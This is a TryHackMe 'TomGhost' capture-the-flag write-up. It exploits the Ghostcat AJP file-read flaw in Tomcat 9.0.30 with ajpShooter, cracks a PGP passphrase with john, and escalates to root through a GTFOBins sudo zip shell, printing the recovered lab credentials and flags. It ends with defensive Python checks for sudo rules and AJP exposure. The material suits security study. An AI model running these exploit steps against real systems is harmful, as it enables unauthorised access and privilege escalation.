# Writeup [TomGhost](https://tryhackme.com/room/tomghost)

###### Let's start with Enumeration

>Let's start with an nmap scan

***==nmap -sV -Pn -A <ip>==***

```
PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQvC8xe2qKLoPG3vaJagEW2eW4juBu9nJvn53nRjyw7y/0GEWIxE1KqcPXZiL+RKfkKA7RJNTXN2W9kCG8i6JdVWs2x9wD28UtwYxcyo6M9dQ7i2mXlJpTHtSncOoufSA45eqWT4GY+iEaBekWhnxWM+TrFOMNS5bpmUXrjuBR2JtN9a9cqHQ2zGdSlN+jLYi2Z5C7IVqxYb9yw5RBV5+bX7J4dvHNIs3otGDeGJ8oXVhd+aELUN8/C2p5bVqpGk04KI2gGEyU611v3eOzoP6obem9vsk7Kkgsw7eRNt1+CBrwWldPr8hy6nhA6Oi5qmJgK1x+fCmsfLSH3sz1z4Ln
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOscw5angd6i9vsr7MfCAugRPvtx/aLjNzjAvoFEkwKeO53N01Dn17eJxrbIWEj33sp8nzx1Lillg/XM+Lk69CQ=
|   256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGqgzoXzgz5QIhEWm3+Mysrwk89YW2cd2Nmad+PrE4jw
53/tcp   open  tcpwrapped syn-ack
8009/tcp open  ajp13      syn-ack Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       syn-ack Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
```

>One port shows up as tcpwrapped, so let's rescan it with a plain TCP connect scan (-sT) in nmap.

```
nmap -sT -p 53 10.10.61.98
Starting Nmap 7.80 ( https://nmap.org ) at 2022-06-24 22:20 IST
Nmap scan report for 10.10.61.98
Host is up (0.37s latency).

PORT   STATE SERVICE
53/tcp open  domain
```

>The second suspicious thing we got is `ajp13` running on port 8009

### [Ajp13](https://apkash8.medium.com/hunting-and-exploiting-apache-ghostcat-b7446ef83e74)

>After running ajpShooter

***==python3 ajpShooter.py http://<ip>:8080/ 8009 /WEB-INF/web.xml read==***

```
1.98:8080/ 8009 /WEB-INF/web.xml read

       _    _         __ _                 _
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|
         |__/|_|
                00theway,just for test

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261

<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
     skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
```

>Here we get a username and password, possibly for ssh, so let's try it

![](https://i.imgur.com/Ds5RtRX.png)

ssh successful!!

### Privilege escalation

>Looking in our current directory, it appears that we have an encrypted [**PGP**](https://superuser.com/questions/46461/decrypt-pgp-file-using-asc-key) (Pretty Good Privacy) file `credential.pgp`, along with an ASCII-armored key `tryhackme.asc`.

So now import the ASCII key

***==gpg --import tryhackme.asc==***

![](https://i.imgur.com/orWYq4S.png)

Now let's decrypt the pgp file

***==gpg --decrypt credential.pgp==***

![](https://i.imgur.com/I6XB8d0.png)

So we need the passphrase, which we can recover from the ASCII key using `john`

***==gpg2john tryhackme.asc > hash==***

***==john hash --wordlist=/usr/share/wordlist/rockyou.txt==***

>Here we get the passphrase ***==`alexandru`==***

```
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp --output credential.txt
skyfuck@ubuntu:~$ cat credential.txt
merlin:##################
```

>So we have to switch user to merlin

```
skyfuck@ubuntu:~$ su merlin
Password:
skyfuck@ubuntu:~$ cat user.txt
THM{GhostCat_1s_so_cr4sy}
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
```

>Here we get `user.txt` and the flag ***==THM{GhostCat_1s_so_cr4sy}==***

>So let's check [GTFOBins](https://gtfobins.github.io/gtfobins/zip/#sudo) to get a shell

```
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
```
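The `sudo -l` output above is what makes the zip route possible: a NOPASSWD entry that runs as root. As an added example (not code from the room or the author), a small parser for `sudo -l` output that a sysadmin can run across hosts to surface such entries; the sample input is the output shown above for merlin, and the `parse_sudo_l` / `passwordless_root` names are my own.

```python
"""Parse `sudo -l` output and flag entries that run as root without a password.

Added example for this writeup, not code from the room or its author.
The sample output below is the `sudo -l` result shown above for merlin.
"""
import re

USER_RE = re.compile(r"^User (?P<user>\S+) may run the following commands on (?P<host>\S+):")
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

SAMPLE_SUDO_L = """Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
"""


def parse_sudo_l(output: str) -> list:
    """Return a dict per command spec: user, host, runas_user, runas_group, tags, commands."""
    entries, user, host, in_cmds = [], None, None, False
    for line in output.splitlines():
        m = USER_RE.match(line)
        if m:                      # everything after this header is a command spec
            user, host, in_cmds = m.group("user"), m.group("host"), True
            continue
        if not in_cmds or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue               # wrapped or continuation line; not handled here
        runas = [p.strip() for p in m.group("runas").split(":")]
        entries.append({
            "user": user,
            "host": host,
            "runas_user": runas[0] or "root",            # sudo defaults runas to root
            "runas_group": runas[1] if len(runas) > 1 else "",
            "tags": [t.strip() for t in m.group("tags").split(":") if t.strip()],
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return entries


def passwordless_root(entries: list) -> list:
    """Entries that run as root (or ALL) with NOPASSWD: check each binary against GTFOBins."""
    return [e for e in entries
            if "NOPASSWD" in e["tags"] and e["runas_user"] in ("root", "ALL")]
```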
![](https://i.imgur.com/hFywNLr.png)

#### So we become root

***==cat /root/root.txt==***

> ***THM{Z1P_1S_FAKE}***
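Back to the Ajp13 step: the web.xml read works because Tomcat 9.0.30 ships its AJP connector enabled, listening on every interface and not requiring a shared secret. As an added example (not code from the room or the author), a Python audit of a Tomcat `server.xml` that reports those three conditions; both `server.xml` fragments are constructed, the `audit_ajp` name is my own, and the code assumes the pre-9.0.31 attribute defaults noted in its comments.

```python
"""Audit a Tomcat server.xml for the AJP connector exposure that Ghostcat relies on.

Added example for this writeup, not code from the room or its author.
Assumes the Tomcat 9.0.30 defaults (AJP enabled, bound to all interfaces,
no secret required); both server.xml fragments below are constructed.
"""
import xml.etree.ElementTree as ET

# Constructed: a default-style Tomcat 9.0.30 server.xml with AJP left on.
EXPOSED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

# Constructed: the same connector bound to loopback and requiring a secret.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET"/>
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp(server_xml: str) -> list:
    """Return one finding string per weak attribute on each AJP connector.

    An empty list means there is no AJP connector, or every one is hardened.
    """
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        # Matches both "AJP/1.3" and the explicit org.apache.coyote.ajp.* class names.
        if "AJP" not in conn.get("protocol", "HTTP/1.1").upper():
            continue
        port = conn.get("port", "?")
        # Before 9.0.31 a missing address attribute meant "listen on all interfaces".
        address = conn.get("address", "0.0.0.0")
        if address not in LOOPBACK:
            findings.append(f"port {port}: AJP listens on {address}; bind to loopback or disable it")
        # secretRequired defaulted to false before 9.0.31; require both the flag and a value.
        if conn.get("secretRequired", "false").lower() != "true" or not conn.get("secret"):
            findings.append(f"port {port}: AJP accepts requests without a shared secret")
    return findings


if __name__ == "__main__":
    for name, xml in (("exposed", EXPOSED_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(name, audit_ajp(xml) or ["ok"])
```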